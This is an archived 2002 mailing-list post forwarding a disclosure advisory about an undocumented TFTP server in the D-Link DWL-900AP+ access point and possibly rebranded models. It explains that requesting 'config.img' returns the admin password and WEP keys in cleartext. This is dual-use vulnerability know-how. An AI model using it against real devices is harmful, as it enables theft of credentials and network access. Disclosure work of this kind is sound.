Ok, so you've locked down your access point with WEP, etc... Now comes the undocumented "features" of AP's. Another reason to put authentication/authorization/encryption on something other than the access point. If you own a newer 22Mbps AP's such as - D-Link DWL-900AP+(Confirmed) - ALLOY GL-2422AP-S - EUSSO GL2422-AP - LINKSYS WAP11-V2.2 - WISECOM GL2422AP-0T ---------------------------------------------------------------------- ETHEREANET-NCC Security Report EN-NCC-20021014-04 D-Link Access Point DWL-900AP+ TFTP Vulnerability Date discovered: Fri, 11 Oct 2002 Vendor notified on: Mon, 14 Oct 2002 Date published: Mon, 21 Oct 2002 Vendor Reference: D-Link US Support Case-ID DL204488 ---------------------------------------------------------------------- Overview -------- While evaluating the D-Link DWL-900AP+ Access Point/Bridge, we discovered a severe vulnerability that could be exploited by a potential intruder to gain full administrative access to the device. Description ----------- D-Link's DWL-900AP+ is a WiFi/802.11b Access Point with enhanced 22Mbps transfer mode (aka "802.11b+") and proprietary bridging functions, tipically targeted at SOHO installation. The device can be connected to an existing wired network by mean of a standard 10/100 ethernet port and can be configured by using a javascript-enabled HTTP client (WEB browser) pointed at its IP address. Although undocumented, the device features also an embedded TFTP (Trivial File Transfer Protocol) server which can be used to obtain critical data: by requesting a file named "config.img", an intruder receive a binary image of the device configuration which contains, among others, the following informations: - the "admin" password required by the HTTP user interface - the WEP encryption keys - the network configuration data (addresses, SSID, etc.) Such data are returned in cleartext and may be accessed by any wired/wireless client. Note that if the device is configured to use a "public" IP address and a valid "gateway" (connected to the Internet) is specified in the wired LAN configuration screen, the TFTP service (hence the crititical data) could be accessed world-wide. Additional info --------------- In addition to the above mentioned "config.img", the following undocumented files are also accessible via the TFTP protocol: - eeprom.dat - mac.dat - wtune.dat - rom.img - normal.img the latest one being the (compressed) firmware image as uploaded to the device. We did not investigate further, so the above list is to be intended as NOT exaustive. Tested devices -------------- Model No: DWL-900AP+ (FCC-ID: KA2DWL900AP-PLUS) H/W: B1 F/W: 2.1 & 2.2 The vulnerability has been observed with both 2.1 & 2.2 firmware revisions. Solutions --------- There are NO known solutions or workarounds at the moment. A firmware upgrade is urged from the vendor. A complete report of the vulnerability was sent to D-Link's International Support <techs@private> on Mon, 14 Oct 2002 and was assigned the case-id: DL204488. Discovered by ------------- Rocco Rionero, <rock@private> Note about potentially affected re-branded devices (NOT VERIFIED) ----------------------------------------------------------------- The DWL-900AP+ appears to be based on a device originally developed by "Global Sun Technology Inc.": as the same device is also sold with other brands, the vulnerability MAY apply to any of them. Potentially affected devices include the following access points: - ALLOY GL-2422AP-S - EUSSO GL2422-AP - LINKSYS WAP11-V2.2 - WISECOM GL2422AP-0T Please, note: NONE of the above was tested. Disclaimer ---------- All information in this report are subject to change without any advanced notices neither mutual consensus; the report itself is released as it is. Neither the author, nor the parts (if any) involved in the distributions of this report are responsible for any risks of occurrences caused by applying the information included =========================================================================== IMPORTANT NOTICE: This communication, including any attachment, contains information that may be confidential or privileged, and is intended solely for the entity or individual to whom it is addressed. If you are not the intended recipient, you should delete this message and are hereby notified that any disclosure, copying, or distribution of this message is strictly prohibited. Nothing in this email, including any attachment, is intended to be a legally binding signature.
This archive was generated by hypermail 2b30 : Fri Oct 25 2002 - 01:54:28 PDT